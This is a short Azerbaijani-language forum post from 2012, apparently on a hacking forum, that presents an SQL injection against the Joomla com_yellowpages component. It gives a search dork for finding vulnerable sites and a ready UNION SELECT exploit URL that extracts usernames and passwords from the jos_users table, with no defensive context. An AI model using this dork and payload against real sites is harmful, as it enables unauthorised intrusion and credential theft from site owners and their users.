Istifadəçi |
2012-05-30 17:11 GMT |
|
|
|
VIP |
|
Mesaj Sayı : 560 |
Mövzu Sayı : |
Rep Ver : |
Rep Sayı : 10 |
Indi Saytda : |
Cinsiyyət : Oğlan |
|
Şəhər : |
Ölkə : |
Məslək : G0ldpr3m1um |
Yaş : |
Mesaj : |
|
Mövzu Adı: Joomla Sql İnj.
Salamlar)) bu gün sizlərə joomla sistemində sql injection acığını göstərəcəm)
#Dork =
inurl:/index.php?option=com_yellowpages
--- SQL Injection Açığı ---
site.com/index.php?option=com_yellowpages&cat=1923[SQL]
===[ Exploit ]===
site.com/path/index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--
+Union+select+user()+from+jos_users--
|
Anti-armenia.ORG |
|